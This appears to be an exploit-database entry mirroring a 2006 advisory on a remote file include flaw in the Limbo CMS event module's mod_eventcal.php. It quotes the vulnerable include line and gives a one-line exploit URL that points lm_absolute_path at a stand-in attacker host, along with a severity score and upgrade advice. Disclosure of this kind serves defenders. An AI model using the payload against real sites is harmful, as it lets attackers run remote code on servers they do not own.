header-logo
Suggest Exploit
vendor:
Limbo CMS event module
by:
xoron
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Limbo CMS event module
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Limbo CMS event module (lm_absolute_path) Remote File Include Vulnerabilities

A vulnerability exists in Limbo CMS event module, which allows a remote attacker to include a file from a remote location. The vulnerability is due to the 'lm_absolute_path' parameter in 'mod_eventcal.php' script not properly sanitized before being used to include files. This can be exploited to include arbitrary files from remote locations by specifying a URL in the 'lm_absolute_path' parameter.

Mitigation:

Upgrade to the latest version of Limbo CMS event module.
Source

Exploit-DB raw data:

-----------------------------------------------

Limbo CMS event module (lm_absolute_path) Remote File Include Vulnerabilities

-----------------------------------------------


Author: xoron

-----------------------------------------------
 
Vuln Code:

include_once($lm_absolute_path."components/com_event/lang/event.".$lm_language.".php");

-----------------------------------------------

3xplo!t:

http://www.[target].com/[script_path]/eventcal/mod_eventcal.php?lm_absolute_path=http://evil_scripts?


-----------------------------------------------

download:  http://www.limbo-tr.com/images/downloads/event.zip

-----------------------------------------------
XORON   -   XORON   -   XORON   -   XORON   -   XORON
-----------------------------------------------------------
-                                                         -
-                                                         -
- Tum muslumanlarin kurban bayrami simdiden mubarek olsun -
-                                                         -
-              Greetz: str0ke, Kacper                     -
-                                                         -
-----------------------------------------------------------

# milw0rm.com [2006-12-27]